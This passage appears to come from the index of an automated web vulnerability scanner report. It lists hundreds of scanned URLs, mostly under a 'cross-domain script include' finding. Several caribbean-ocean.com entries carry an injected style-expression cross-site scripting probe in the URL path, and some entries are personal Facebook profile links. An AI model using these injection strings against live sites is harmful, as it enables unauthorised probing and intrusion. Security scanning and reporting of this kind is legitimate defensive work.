20.564. http://www4.jcpenney.com/jcp/XGN.aspx

20.565. http://www4.jcpenney.com/jcp/getjcpheaderc.aspx

20.566. http://www4.jcpenney.com/jcp/x2.aspx

20.567. http://www4.jcpenney.com/jcp/x2.aspx

20.568. http://www4.tinker.com/standard/js/common.js

20.569. http://www4.tinker.com/standard/js/map/map.js

20.570. http://www4.tinker.com/standard/widget_sm.html

20.571. http://www5.jcpenney.com/jcp/X6E.aspx

20.572. http://www5.jcpenney.com/jcp/getjcpheaderc.aspx

21. Cross-domain script include

21.1. http://www.4shared.com/

21.2. http://www.4shared.com/advertise/

21.3. http://www.4shared.com/contact.jsp

21.4. http://www.4shared.com/desktop/

21.5. http://www.4shared.com/enter.jsp

21.6. http://www.4shared.com/faq.jsp

21.7. http://www.4shared.com/icons/16x16/

21.8. http://www.4shared.com/index.jsp

21.9. http://www.4shared.com/m/android.jsp

21.10. http://www.4shared.com/m/blackberry.jsp

21.11. http://www.4shared.com/m/symbian.jsp

21.12. http://www.4shared.com/premium.jsp

21.13. http://www.4shared.com/press_room/

21.14. http://www.4shared.com/privacy.jsp

21.15. http://www.4shared.com/remindPassword.jsp

21.16. http://www.4shared.com/resellers.jsp

21.17. http://www.4shared.com/signup.jsp

21.18. http://www.4shared.com/terms.jsp

21.19. http://www.4shared.com/toolbar/

21.20. http://www.activeendurance.com/running.htm

21.21. http://www.addthis.com/bookmark.php

21.22. http://www.admob.com/

21.23. http://www.atlasventure.com/

21.24. http://www.autoinsurancepool.info/

21.25. http://www.b3b.ch/2011/03/27/rien-ne-va-plus-dans-la-securite-linfoguerre-est-declaree/

21.26. http://www.barracudalabs.com/

21.27. http://www.barracudanetworks.com/ns/

21.28. http://www.barracudanetworks.com/ns/

21.29. http://www.barracudanetworks.com/ns/company/

21.30. http://www.barracudanetworks.com/ns/privacy/

21.31. http://www.barracudanetworks.com/ns/products/

21.32. http://www.barracudanetworks.com/ns/products/index.php

21.33. http://www.barracudanetworks.com/ns/products/purewire_web_security_service_overview.php

21.34. http://www.barracudanetworks.com/ns/products/spam_overview.php

21.35. http://www.barracudanetworks.com/ns/products/web-application-controller-overview.php

21.36. http://www.barracudanetworks.com/ns/products/web-site-firewall-overview.php

21.37. http://www.barracudanetworks.com/ns/purchase/

21.38. https://www.barracudanetworks.com/ns/products/request_eval_unit.php

21.39. http://www.bizfind.us/

21.40. http://www.bizfind.us/Index.asp

21.41. http://www.bizfind.us/search.asp

21.42. http://www.bluefountainmedia.com/about-overview

21.43. http://www.bluefountainmedia.com/about/our-story

21.44. http://www.bluefountainmedia.com/blog/

21.45. http://www.bluefountainmedia.com/blog/jcpenney-black-hat-seo-techniques/

21.46. http://www.bluefountainmedia.com/business/

21.47. http://www.bluefountainmedia.com/case-studies

21.48. http://www.bluefountainmedia.com/case-studies/anthony-for-men

21.49. http://www.bluefountainmedia.com/case-studies/broadway-nails

21.50. http://www.bluefountainmedia.com/case-studies/disney

21.51. http://www.bluefountainmedia.com/case-studies/nfl-youth-pd

21.52. http://www.bluefountainmedia.com/case-studies/r-a-g-new-york

21.53. http://www.bluefountainmedia.com/case-studies/smarties

21.54. http://www.bluefountainmedia.com/case-studies/spafinder

21.55. http://www.bluefountainmedia.com/clients/companies-served

21.56. http://www.bluefountainmedia.com/content-management-systems

21.57. http://www.bluefountainmedia.com/ecommerce-design

21.58. http://www.bluefountainmedia.com/flash-design-development

21.59. http://www.bluefountainmedia.com/portfolio/websites

21.60. http://www.bluefountainmedia.com/search

21.61. http://www.bluefountainmedia.com/team

21.62. http://www.bluefountainmedia.com/website-design-development

21.63. http://www.brash.com/

21.64. http://www.broadcast-interactive.com/

21.65. http://www.businessinsider.com/how-to-estimate-market-size-2011-3

21.66. http://www.caribbean-ocean.com/

21.67. http://www.caribbean-ocean.com/enq.php/%22%20stYle=%22x:expre/**/images/aus-spec.gif

21.68. http://www.caribbean-ocean.com/enq.php/%22%20stYle=%22x:expre/**/images/dubai-expert.jpg

21.69. http://www.caribbean-ocean.com/enq.php/%22%20stYle=%22x:expre/**/stylesheet.css

21.70. http://www.caribbean-ocean.com/enq.php/images/aus-spec.gif

21.71. http://www.caribbean-ocean.com/enq.php/images/dubai-expert.jpg

21.72. http://www.caribbean-ocean.com/enq.php/stylesheet.css

21.73. http://www.caribbean-ocean.com/get-in-touch.php/%22%20stYle=%22x:expre/**/images/aus-spec.gif

21.74. http://www.caribbean-ocean.com/get-in-touch.php/%22%20stYle=%22x:expre/**/images/dubai-expert.jpg

21.75. http://www.caribbean-ocean.com/get-in-touch.php/%22%20stYle=%22x:expre/**/stylesheet.css

21.76. http://www.caribbean-ocean.com/get-in-touch.php/images/aus-spec.gif

21.77. http://www.caribbean-ocean.com/get-in-touch.php/images/dubai-expert.jpg

21.78. http://www.caribbean-ocean.com/get-in-touch.php/stylesheet.css

21.79. http://www.cmswire.com/events/item/source-boston-006828.php

21.80. http://www.coach.com/online/handbags/Home-10551-10051

21.81. http://www.coach.com/online/handbags/StoreLocatorView

21.82. http://www.comodo.com/

21.83. http://www.comodo.com/business-security/digital-certificates/ssl-certificates.php

21.84. http://www.csoonline.com/article/679466/source-boston-2011-two-views-on-infosec-interviewing-hiring

21.85. http://www.demandmedia.com/studios/writers/

21.86. https://www.demandstudios.com/application.html

21.87. http://www.denimgroup.com/

21.88. http://www.dico-citations.com/vingt-ans-de-placard-les-b-n-fices-a-se-divise-la-r-clusion-a-s-additionne-audiard-michel/

21.89. http://www.digitalbond.com/2008/07/20/managing-your-security-career/

21.90. https://www.digitalbond.com/wp-login.php

21.91. http://www.duechiacchiere.it/wp-slimstat

21.92. http://www.emarketer.com/(S(r0cbc4551ke3ivvedae1jd45))/Article.aspx

21.93. http://www.epsilon.com/

21.94. http://www.espn.co.uk/

21.95. http://www.espncms.com/

21.96. http://www.espnmediazone3.com/us/category/releases/

21.97. http://www.espnshop.com/family/index.jsp

21.98. http://www.eweekeurope.co.uk/news/google-speeds-up-crankshaft-with-chrome-10-beta-21491/x26amp

21.99. http://www.executiveboard.com/

21.100. http://www.executiveboard.com/about/index.html

21.101. http://www.executiveboard.com/contact-us/index.html

21.102. http://www.executiveboard.com/corporate-finance/index.html

21.103. http://www.executiveboard.com/executive-guidance/2011/Q1/index.html

21.104. http://www.executiveboard.com/index.html

21.105. http://www.executiveboard.com/insights/index.html

21.106. http://www.executiveboard.com/services/index.html

21.107. http://www.f-secure.com/weblog/archives/00002127.html

21.108. http://www.facebook.com/2008/fbml

21.109. http://www.facebook.com/BLane77

21.110. http://www.facebook.com/DOUCHE01

21.111. http://www.facebook.com/ESPNNewYork

21.112. http://www.facebook.com/JohnFerrell

21.113. http://www.facebook.com/KOMONews

21.114. http://www.facebook.com/SaMmFalK

21.115. http://www.facebook.com/angie.eronson

21.116. http://www.facebook.com/cdulitz

21.117. http://www.facebook.com/chester.mitre

21.118. http://www.facebook.com/chris.paulette

21.119. http://www.facebook.com/daryl.shelby

21.120. http://www.facebook.com/deejayeric908

21.121. http://www.facebook.com/deekron

21.122. http://www.facebook.com/haydn.long

21.123. http://www.facebook.com/highrock.singers

21.124. http://www.facebook.com/jill.hightower1

21.125. http://www.facebook.com/khristhianssenj

21.126. http://www.facebook.com/pages/Theron-Zahn-KOMO/180364211988503

21.127. http://www.facebook.com/plugins/activity.php

21.128. http://www.facebook.com/plugins/activity.php

21.129. http://www.facebook.com/plugins/activity.php

21.130. http://www.facebook.com/plugins/facepile.php

21.131. http://www.facebook.com/plugins/like.php

21.132. http://www.facebook.com/plugins/like.php

21.133. http://www.facebook.com/plugins/like.php

21.134. http://www.facebook.com/plugins/like.php

21.135. http://www.facebook.com/plugins/like.php

21.136. http://www.facebook.com/plugins/like.php

21.137. http://www.facebook.com/plugins/like.php

21.138. http://www.facebook.com/plugins/like.php

21.139. http://www.facebook.com/plugins/likebox.php

21.140. http://www.facebook.com/plugins/likebox.php

21.141. http://www.facebook.com/plugins/likebox.php

21.142. http://www.facebook.com/plugins/likebox.php

21.143. http://www.facebook.com/plugins/likebox.php

21.144. http://www.facebook.com/profile.php

21.145. http://www.facebook.com/raymond.cree

21.146. http://www.facebook.com/scottskomo

21.147. http://www.facebook.com/sharer.php

21.148. http://www.facebook.com/sharer.php

21.149. http://www.facebook.com/tracey.westerlund

21.150. http://www.facebook.com/viglink

21.151. http://www.freebox-v6.fr/

21.152. http://www.freebox-v6.fr/index.php/blog/article/52/Demandez-votre-Gamepad

21.153. http://www.freebox-v6.fr/index.php/blog/article/74/Freebox-V6-le-point-sur-les-livraisons

21.154. http://www.garage4hackers.com/showthread.php

21.155. http://www.gfi.com/

21.156. http://www.glam.com/

21.157. http://www.glam.com/

21.158. http://www.glam.com/

21.159. http://www.glam.com/app/site/affiliate/viewChannelModule.act

21.160. http://www.glam.com/app/site/affiliate/viewChannelModule.act

21.161. http://www.glam.com/app/site/affiliate/viewChannelModule.act

21.162. http://www.google.com/uds/solutions/localsearch/gmlocalsearch.js

21.163. https://www.google.com/adsense/support/bin/request.py

21.164. https://www.infosecisland.com/blogview/12822-Spear-Phishing-Season-Is-Declared-Open.html

21.165. http://www.infosecleaders.com/

21.166. http://www.internetnews.com/img/blog/gradient.gif

21.167. http://www.isecpartners.com/

21.168. http://www.jcpenney.com/jcp/default.aspx

21.169. http://www.jcpstoreads.com/jcpenney/Default.aspx

21.170. http://www.jotform.com/form/2910946098

21.171. http://www.komonews.com/

21.172. http://www.komonews.com/about

21.173. http://www.komonews.com/about/42141282.html

21.174. http://www.komonews.com/about/88685637.html

21.175. http://www.komonews.com/about/contact

21.176. http://www.komonews.com/about/events

21.177. http://www.komonews.com/about/people/fournews/4257946.html

21.178. http://www.komonews.com/about/people/fournews/4259526.html

21.179. http://www.komonews.com/about/people/fournews/57733327.html

21.180. http://www.komonews.com/about/people/fournews/Paul-Deanno.html

21.181. http://www.komonews.com/about/people/site/Scott-Sistek.html

21.182. http://www.komonews.com/about/privacy

21.183. http://www.komonews.com/about/schedule

21.184. http://www.komonews.com/about/terms

21.185. http://www.komonews.com/aboutradio

21.186. http://www.komonews.com/aboutradio/live/42934697.html

21.187. http://www.komonews.com/advertise

21.188. http://www.komonews.com/communities

21.189. http://www.komonews.com/entertainment

21.190. http://www.komonews.com/home/video/116474128.html

21.191. http://www.komonews.com/home/video/116545678.html

21.192. http://www.komonews.com/home/video/116673784.html

21.193. http://www.komonews.com/home/video/116675584.html

21.194. http://www.komonews.com/home/video/116675749.html

21.195. http://www.komonews.com/home/video/116702184.html

21.196. http://www.komonews.com/hotlinks

21.197. http://www.komonews.com/live

21.198. http://www.komonews.com/living

21.199. http://www.komonews.com/news/

21.200. http://www.komonews.com/news/116650859.html

21.201. http://www.komonews.com/news/116650859.html

21.202. http://www.komonews.com/news/116652534.html

21.203. http://www.komonews.com/news/116694569.html

21.204. http://www.komonews.com/news/116694569.html

21.205. http://www.komonews.com/news/116694614.html

21.206. http://www.komonews.com/news/116707379.html

21.207. http://www.komonews.com/news/116727124.html

21.208. http://www.komonews.com/news/boeing/116707614.html

21.209. http://www.komonews.com/news/business

21.210. http://www.komonews.com/news/business/116735244.html

21.211. http://www.komonews.com/news/business/116739564.html

21.212. http://www.komonews.com/news/business/116739939.html

21.213. http://www.komonews.com/news/business/116740159.html

21.214. http://www.komonews.com/news/business/116740389.html

21.215. http://www.komonews.com/news/consumer

21.216. http://www.komonews.com/news/consumer/116673109.html

21.217. http://www.komonews.com/news/consumer/116704069.html

21.218. http://www.komonews.com/news/content/9958596.html

21.219. http://www.komonews.com/news/content/scanner

21.220. http://www.komonews.com/news/content/schools/36500344.html

21.221. http://www.komonews.com/news/entertainment

21.222. http://www.komonews.com/news/entertainment/116123569.html

21.223. http://www.komonews.com/news/entertainment/116189709.html

21.224. http://www.komonews.com/news/entertainment/116665019.html

21.225. http://www.komonews.com/news/entertainment/116680394.html

21.226. http://www.komonews.com/news/entertainment/116692424.html

21.227. http://www.komonews.com/news/entertainment/116704174.html

21.228. http://www.komonews.com/news/entertainment/116707059.html

21.229. http://www.komonews.com/news/entertainment/116710289.html

21.230. http://www.komonews.com/news/entertainment/116737029.html

21.231. http://www.komonews.com/news/entertainment/116737724.html

21.232. http://www.komonews.com/news/health

21.233. http://www.komonews.com/news/health/116753189.html

21.234. http://www.komonews.com/news/local

21.235. http://www.komonews.com/news/local/

21.236. http://www.komonews.com/news/local/116231884.html

21.237. http://www.komonews.com/news/local/116509853.html

21.238. http://www.komonews.com/news/local/116694614.html

21.239. http://www.komonews.com/news/local/116703604.html

21.240. http://www.komonews.com/news/local/116703604.html

21.241. http://www.komonews.com/news/local/116706579.html

21.242. http://www.komonews.com/news/local/116707379.html

21.243. http://www.komonews.com/news/local/116712649.html

21.244. http://www.komonews.com/news/local/116714899.html

21.245. http://www.komonews.com/news/local/116727124.html

21.246. http://www.komonews.com/news/local/116745309.html

21.247. http://www.komonews.com/news/local/116752479.html

21.248. http://www.komonews.com/news/local/116755469.html

21.249. http://www.komonews.com/news/national

21.250. http://www.komonews.com/news/national/

21.251. http://www.komonews.com/news/national/115640079.html

21.252. http://www.komonews.com/news/national/116404039.html

21.253. http://www.komonews.com/news/national/116502428.html

21.254. http://www.komonews.com/news/national/116713504.html

21.255. http://www.komonews.com/news/national/116734714.html

21.256. http://www.komonews.com/news/national/116736489.html

21.257. http://www.komonews.com/news/national/116736624.html

21.258. http://www.komonews.com/news/national/116747399.html

21.259. http://www.komonews.com/news/national/116750534.html

21.260. http://www.komonews.com/news/national/116750784.html

21.261. http://www.komonews.com/news/offbeat

21.262. http://www.komonews.com/news/offbeat/116565253.html

21.263. http://www.komonews.com/news/offbeat/116611588.html

21.264. http://www.komonews.com/news/offbeat/116622758.html

21.265. http://www.komonews.com/news/offbeat/116623473.html

21.266. http://www.komonews.com/news/offbeat/116690659.html

21.267. http://www.komonews.com/news/offbeat/116708664.html

21.268. http://www.komonews.com/news/offbeat/116708719.html

21.269. http://www.komonews.com/news/offbeat/116749349.html

21.270. http://www.komonews.com/news/problemsolvers

21.271. http://www.komonews.com/news/tech

21.272. http://www.komonews.com/news/tech/116596303.html

21.273. http://www.komonews.com/news/tech/116609493.html

21.274. http://www.komonews.com/news/tech/116666119.html

21.275. http://www.komonews.com/news/tech/116674969.html

21.276. http://www.komonews.com/news/tech/116740874.html

21.277. http://www.komonews.com/news/tech/116748424.html

21.278. http://www.komonews.com/news/topline

21.279. http://www.komonews.com/news/topline/116742439.html

21.280. http://www.komonews.com/obits

21.281. http://www.komonews.com/obits/

21.282. http://www.komonews.com/opinion/kenschram

21.283. http://www.komonews.com/opinion/kenschram/116741919.html

21.284. http://www.komonews.com/sports

21.285. http://www.komonews.com/sports/

21.286. http://www.komonews.com/sports/116570948.html

21.287. http://www.komonews.com/sports/116572113.html

21.288. http://www.komonews.com/sports/116601093.html

21.289. http://www.komonews.com/sports/116612208.html

21.290. http://www.komonews.com/sports/116713754.html

21.291. http://www.komonews.com/traffic

21.292. http://www.komonews.com/traffic/flights

21.293. http://www.komonews.com/traffic/passreports

21.294. http://www.komonews.com/weather

21.295. http://www.komonews.com/weather/blogs

21.296. http://www.komonews.com/weather/blogs/

21.297. http://www.komonews.com/weather/blogs/scott

21.298. http://www.komonews.com/weather/blogs/scott/116619838.html

21.299. http://www.komonews.com/weather/blogs/scott/116678464.html

21.300. http://www.komonews.com/weather/blogs/scott/116715374.html

21.301. http://www.komonews.com/weather/blogs/scott/116732159.html

21.302. http://www.komonews.com/weather/blogs/shannon

21.303. http://www.komonews.com/weather/cameras

21.304. http://www.komonews.com/weather/faq

21.305. http://www.komonews.com/weather/faq/4308877.html

21.306. http://www.komonews.com/weather/faq/4310827.html

21.307. http://www.komonews.com/weather/hotlinks

21.308. http://www.komonews.com/weather/maps

21.309. http://www.komonews.com/weather/quakes

21.310. http://www.komonews.com/weather/radar

21.311. http://www.komonews.com/weather/radar/4327257.html

21.312. http://www.komonews.com/weather/satellite

21.313. http://www.komonews.com/weather/skireport

21.314. http://www.komonews.com/younews

21.315. http://www.komonews.com/younews/116761799.html

21.316. http://www.komonews.com/younews/116762164.html

21.317. http://www.komonews.com/younews/116762524.html

21.318. http://www.komonews.com/younews/116762774.html

21.319. http://www.komonews.com/younews/116762809.html

21.320. http://www.korben.info/hack-de-twitter-la-suite.html

21.321. http://www.leanlogistics.com/

21.322. http://www.leanlogistics.com/leanlogistics_contact.html

21.323. http://www.lemonde.fr/economie/article/2011/04/13/soupcons-d-espionnage-chez-safran-sans-vol-de-donnees-a-caractere-industriel_1506757_3234.html

21.324. http://www.lightspeedvp.com/

21.325. http://www.loggly.com/

21.326. http://www.madsecinc.com/

21.327. http://www.mandiant.com/

21.328. http://www.manta.com/c/mtl07lp/industrial-waste-recovery-llc

21.329. http://www.manta.com/cs/mtl07lp/industrial-waste-recovery-llc

21.330. http://www.manta.com/mb_34_E33B9_000/refuse_systems

21.331. http://www.manta.com/member/register/

21.332. http://www.manta.com/profile/my-companies/select

21.333. http://www.massey-coldbeck.co.uk/

21.334. http://www.massey-coldbeck.co.uk/1ph.html

21.335. http://www.massey-coldbeck.co.uk/centridffan.html

21.336. http://www.massey-coldbeck.co.uk/crossflow.html

21.337. http://www.massey-coldbeck.co.uk/electricmotorrange.htm

21.338. http://www.massey-coldbeck.co.uk/haz.html

21.339. http://www.massey-coldbeck.co.uk/links.htm

21.340. http://www.massey-coldbeck.co.uk/map.htm

21.341. http://www.massey-coldbeck.co.uk/services.htm

21.342. http://www.medialets.com/

21.343. http://www.meetup.com/AffiliateSummit/San-Francisco-CA/81593/

21.344. http://www.meetup.com/San-Francisco-Blog-Club/

21.345. http://www.metropcs.com/

21.346. http://www.microsoft.com/global/security/microsites/msrc/PublishingImages/spacer.gif

21.347. http://www.microsoft.com/global/security/msrc/RenderingAssets/scripts/jquery-1.4.1.min.js

21.348. http://www.microsoftstore.com/store/msstore/en_US/buy/pageType.product/externalRefID.8D6DDFB5

21.349. http://www.miscmag.com/

21.350. http://www.miscmag.com/index.php/2011/03/25/edito-misc-hs-n°3

21.351. http://www.multiupload.com/J9I8NFWPT0

21.352. http://www.multiupload.com/TGDP99CJLH

21.353. http://www.murraynewlands.com/

21.354. http://www.ncircle.com/

21.355. http://www.ndbc.noaa.gov/station_page.php

21.356. http://www.net-security.org/

21.357. http://www.newsvine.com/_wine/save

21.358. http://www.noaanews.noaa.gov/stories2011/20110223_coralspeech.html

21.359. http://www.noaanews.noaa.gov/stories2011/20110224_climate.html

21.360. http://www.opensource.org/licenses/gpl-license.php

21.361. http://www.opensource.org/licenses/mit-license.php

21.362. http://www.outsourcermarketplace.com/faq.php

21.363. http://www.packetmotion.com/

21.364. http://www.paper-source.com/cgi-bin/paper/locations/ma_boston.html

21.365. http://www.performancemarketingassociation.com/advocateform.html

21.366. http://www.poisonivy-rat.com/

21.367. http://www.polygonhomes.com/polygon/communities/ThisCommunity.aspx

21.368. http://www.protides.com/washington/

21.369. http://www.pwnieexpress.com/

21.370. http://www.quantcast.com/

21.371. http://www.quantcast.com/4shared.com

21.372. http://www.quantcast.com/about

21.373. http://www.quantcast.com/about.com

21.374. http://www.quantcast.com/accuweather.com

21.375. http://www.quantcast.com/ad4game.com

21.376. http://www.quantcast.com/adobe.com

21.377. http://www.quantcast.com/allrecipes.com

21.378. http://www.quantcast.com/amazon.com

21.379. http://www.quantcast.com/ancestry.com

21.380. http://www.quantcast.com/angelfire.com

21.381. http://www.quantcast.com/answerbag.com

21.382. http://www.quantcast.com/answers.com

21.383. http://www.quantcast.com/aol.com

21.384. http://www.quantcast.com/api/suggest

21.385. http://www.quantcast.com/apple.com

21.386. http://www.quantcast.com/articlesbase.com

21.387. http://www.quantcast.com/ask.com

21.388. http://www.quantcast.com/askmen.com

21.389. http://www.quantcast.com/associatedcontent.com

21.390. http://www.quantcast.com/att.com

21.391. http://www.quantcast.com/autotrader.com

21.392. http://www.quantcast.com/babycenter.com

21.393. http://www.quantcast.com/bankofamerica.com

21.394. http://www.quantcast.com/barnesandnoble.com

21.395. http://www.quantcast.com/bbc.co.uk

21.396. http://www.quantcast.com/bestbuy.com

21.397. http://www.quantcast.com/bing.com

21.398. http://www.quantcast.com/bizrate.com

21.399. http://www.quantcast.com/bleacherreport.com

21.400. http://www.quantcast.com/blogger.com

21.401. http://www.quantcast.com/blogspot.com

21.402. http://www.quantcast.com/blurtit.com

21.403. http://www.quantcast.com/borders.com

21.404. http://www.quantcast.com/boreme.com

21.405. http://www.quantcast.com/break.com

21.406. http://www.quantcast.com/brothersoft.com

21.407. http://www.quantcast.com/buycheapr.com

21.408. http://www.quantcast.com/ca.gov

21.409. http://www.quantcast.com/candystand.com

21.410. http://www.quantcast.com/capitalone.com

21.411. http://www.quantcast.com/careerbuilder.com

21.412. http://www.quantcast.com/careers

21.413. http://www.quantcast.com/causes.com

21.414. http://www.quantcast.com/cbsnews.com

21.415. http://www.quantcast.com/cbssports.com

21.416. http://www.quantcast.com/chacha.com

21.417. http://www.quantcast.com/chase.com

21.418. http://www.quantcast.com/city-data.com

21.419. http://www.quantcast.com/cnbc.com

21.420. http://www.quantcast.com/cnet.com

21.421. http://www.quantcast.com/cnn.com

21.422. http://www.quantcast.com/comcast.com

21.423. http://www.quantcast.com/comcast.net

21.424. http://www.quantcast.com/contact

21.425. http://www.quantcast.com/coolmath-games.com

21.426. http://www.quantcast.com/craigslist.org

21.427. http://www.quantcast.com/dailymotion.com

21.428. http://www.quantcast.com/dell.com

21.429. http://www.quantcast.com/deviantart.com

21.430. http://www.quantcast.com/digg.com

21.431. http://www.quantcast.com/directv.com

21.432. http://www.quantcast.com/docstoc.com

21.433. http://www.quantcast.com/drudgereport.com

21.434. http://www.quantcast.com/drugs.com

21.435. http://www.quantcast.com/ebay.com

21.436. http://www.quantcast.com/edmunds.com

21.437. http://www.quantcast.com/ehow.com

21.438. http://www.quantcast.com/etsy.com

21.439. http://www.quantcast.com/evite.com

21.440. http://www.quantcast.com/ew.com

21.441. http://www.quantcast.com/examiner.com

21.442. http://www.quantcast.com/expedia.com

21.443. http://www.quantcast.com/ezinearticles.com

21.444. http://www.quantcast.com/facebook.com

21.445. http://www.quantcast.com/fedex.com

21.446. http://www.quantcast.com/filestube.com

21.447. http://www.quantcast.com/filmannex.com

21.448. http://www.quantcast.com/fixya.com

21.449. http://www.quantcast.com/flickr.com

21.450. http://www.quantcast.com/foodnetwork.com

21.451. http://www.quantcast.com/formspring.me

21.452. http://www.quantcast.com/foxnews.com

21.453. http://www.quantcast.com/gawker.com

21.454. http://www.quantcast.com/go.com

21.455. http://www.quantcast.com/godaddy.com

21.456. http://www.quantcast.com/google.com

21.457. http://www.quantcast.com/grindtv.com

21.458. http://www.quantcast.com/healthgrades.com

21.459. http://www.quantcast.com/homedepot.com

21.460. http://www.quantcast.com/howstuffworks.com

21.461. http://www.quantcast.com/hp.com

21.462. http://www.quantcast.com/hubpages.com

21.463. http://www.quantcast.com/huffingtonpost.com

21.464. http://www.quantcast.com/hulu.com

21.465. http://www.quantcast.com/ign.com

21.466. http://www.quantcast.com/imdb.com

21.467. http://www.quantcast.com/indeed.com

21.468. http://www.quantcast.com/inside-quantcast

21.469. http://www.quantcast.com/intuit.com

21.470. http://www.quantcast.com/irs.gov

21.471. http://www.quantcast.com/jcpenney.com

21.472. http://www.quantcast.com/justanswer.com

21.473. http://www.quantcast.com/kohls.com

21.474. http://www.quantcast.com/komonews.com

21.475. http://www.quantcast.com/legacy.com

21.476. http://www.quantcast.com/linkedin.com

21.477. http://www.quantcast.com/live.com

21.478. http://www.quantcast.com/local.com

21.479. http://www.quantcast.com/localpages.com

21.480. http://www.quantcast.com/lowes.com

21.481. http://www.quantcast.com/manta.com

21.482. http://www.quantcast.com/mapquest.com

21.483. http://www.quantcast.com/match.com

21.484. http://www.quantcast.com/mayoclinic.com

21.485. http://www.quantcast.com/medicinenet.com

21.486. http://www.quantcast.com/merchantcircle.com

21.487. http://www.quantcast.com/merriam-webster.com

21.488. http://www.quantcast.com/metacafe.com

21.489. http://www.quantcast.com/microsoft.com

21.490. http://www.quantcast.com/miniclip.com

21.491. http://www.quantcast.com/monster.com

21.492. http://www.quantcast.com/moviefone.com

21.493. http://www.quantcast.com/msn.com

21.494. http://www.quantcast.com/mtv.com

21.495. http://www.quantcast.com/myspace.com

21.496. http://www.quantcast.com/nbc.com

21.497. http://www.quantcast.com/netflix.com

21.498. http://www.quantcast.com/nfl.com

21.499. http://www.quantcast.com/nih.gov

21.500. http://www.quantcast.com/noaa.gov

21.501. http://www.quantcast.com/norton.com

21.502. http://www.quantcast.com/nydailynews.com

21.503. http://www.quantcast.com/nytimes.com

21.504. http://www.quantcast.com/opt-out

21.505. http://www.quantcast.com/overstock.com

21.506. http://www.quantcast.com/p-23Fqia_-MkKko

21.507. http://www.quantcast.com/pandora.com

21.508. http://www.quantcast.com/paypal.com

21.509. http://www.quantcast.com/people.com

21.510. http://www.quantcast.com/photobucket.com

21.511. http://www.quantcast.com/planner

21.512. http://www.quantcast.com/pogo.com

21.513. http://www.quantcast.com/privacy

21.514. http://www.quantcast.com/profile-index

21.515. http://www.quantcast.com/pronto.com

21.516. http://www.quantcast.com/reddit.com

21.517. http://www.quantcast.com/reference.com

21.518. http://www.quantcast.com/righthealth.com

21.519. http://www.quantcast.com/rockyou.com

21.520. http://www.quantcast.com/rr.com

21.521. http://www.quantcast.com/scribd.com

21.522. http://www.quantcast.com/search

21.523. http://www.quantcast.com/searchassist.com

21.524. http://www.quantcast.com/sears.com

21.525. http://www.quantcast.com/shopathome.com

21.526. http://www.quantcast.com/shoplocal.com

21.527. http://www.quantcast.com/shopping.com

21.528. http://www.quantcast.com/shopzilla.com

21.529. http://www.quantcast.com/simplyhired.com

21.530. http://www.quantcast.com/sitemap-page

21.531. http://www.quantcast.com/smileycentral.com

21.532. http://www.quantcast.com/softonic.com

21.533. http://www.quantcast.com/spokeo.com

21.534. http://www.quantcast.com/squidoo.com

21.535. http://www.quantcast.com/staples.com

21.536. http://www.quantcast.com/suite101.com

21.537. http://www.quantcast.com/superpages.com

21.538. http://www.quantcast.com/target.com

21.539. http://www.quantcast.com/terms

21.540. http://www.quantcast.com/thefind.com

21.541. http://www.quantcast.com/thesaurus.com

21.542. http://www.quantcast.com/time.com

21.543. http://www.quantcast.com/tmz.com

21.544. http://www.quantcast.com/top-sites

21.545. http://www.quantcast.com/top-sites-1

21.546. http://www.quantcast.com/top-sites/AD

21.547. http://www.quantcast.com/top-sites/AE

21.548. http://www.quantcast.com/top-sites/AF

21.549. http://www.quantcast.com/top-sites/AG

21.550. http://www.quantcast.com/top-sites/AI

21.551. http://www.quantcast.com/top-sites/AL

21.552. http://www.quantcast.com/top-sites/AM

21.553. http://www.quantcast.com/top-sites/AN

21.554. http://www.quantcast.com/top-sites/AO

21.555. http://www.quantcast.com/top-sites/AQ

21.556. http://www.quantcast.com/top-sites/AR

21.557. http://www.quantcast.com/top-sites/AS

21.558. http://www.quantcast.com/top-sites/AT

21.559. http://www.quantcast.com/top-sites/AU

21.560. http://www.quantcast.com/top-sites/AW

21.561. http://www.quantcast.com/top-sites/AX

21.562. http://www.quantcast.com/top-sites/AZ

21.563. http://www.quantcast.com/top-sites/BA

21.564. http://www.quantcast.com/top-sites/BB

21.565. http://www.quantcast.com/top-sites/BD

21.566. http://www.quantcast.com/top-sites/BE

21.567. http://www.quantcast.com/top-sites/BF

21.568. http://www.quantcast.com/top-sites/BG

21.569. http://www.quantcast.com/top-sites/BH

21.570. http://www.quantcast.com/top-sites/BI

21.571. http://www.quantcast.com/top-sites/BJ

21.572. http://www.quantcast.com/top-sites/BM

21.573. http://www.quantcast.com/top-sites/BN

21.574. http://www.quantcast.com/top-sites/BO

21.575. http://www.quantcast.com/top-sites/BR

21.576. http://www.quantcast.com/top-sites/BS

21.577. http://www.quantcast.com/top-sites/BT

21.578. http://www.quantcast.com/top-sites/BV

21.579. http://www.quantcast.com/top-sites/BW

21.580. http://www.quantcast.com/top-sites/BY

21.581. http://www.quantcast.com/top-sites/BZ

21.582. http://www.quantcast.com/top-sites/CA

21.583. http://www.quantcast.com/top-sites/CC

21.584. http://www.quantcast.com/top-sites/CD

21.585. http://www.quantcast.com/top-sites/CF

21.586. http://www.quantcast.com/top-sites/CG

21.587. http://www.quantcast.com/top-sites/CH

21.588. http://www.quantcast.com/top-sites/CI

21.589. http://www.quantcast.com/top-sites/CK

21.590. http://www.quantcast.com/top-sites/CL

21.591. http://www.quantcast.com/top-sites/CM

21.592. http://www.quantcast.com/top-sites/CN

21.593. http://www.quantcast.com/top-sites/CO

21.594. http://www.quantcast.com/top-sites/CR

21.595. http://www.quantcast.com/top-sites/CU

21.596. http://www.quantcast.com/top-sites/CV

21.597. http://www.quantcast.com/top-sites/CX

21.598. http://www.quantcast.com/top-sites/CY

21.599. http://www.quantcast.com/top-sites/CZ

21.600. http://www.quantcast.com/top-sites/DE

21.601. http://www.quantcast.com/top-sites/DJ

21.602. http://www.quantcast.com/top-sites/DK

21.603. http://www.quantcast.com/top-sites/DM

21.604. http://www.quantcast.com/top-sites/DO

21.605. http://www.quantcast.com/top-sites/DZ

21.606. http://www.quantcast.com/top-sites/EC

21.607. http://www.quantcast.com/top-sites/EE

21.608. http://www.quantcast.com/top-sites/EG

21.609. http://www.quantcast.com/top-sites/EH

21.610. http://www.quantcast.com/top-sites/ER

21.611. http://www.quantcast.com/top-sites/ES

21.612. http://www.quantcast.com/top-sites/ET

21.613. http://www.quantcast.com/top-sites/FI

21.614. http://www.quantcast.com/top-sites/FJ

21.615. http://www.quantcast.com/top-sites/FK

21.616. http://www.quantcast.com/top-sites/FM

21.617. http://www.quantcast.com/top-sites/FO

21.618. http://www.quantcast.com/top-sites/FR

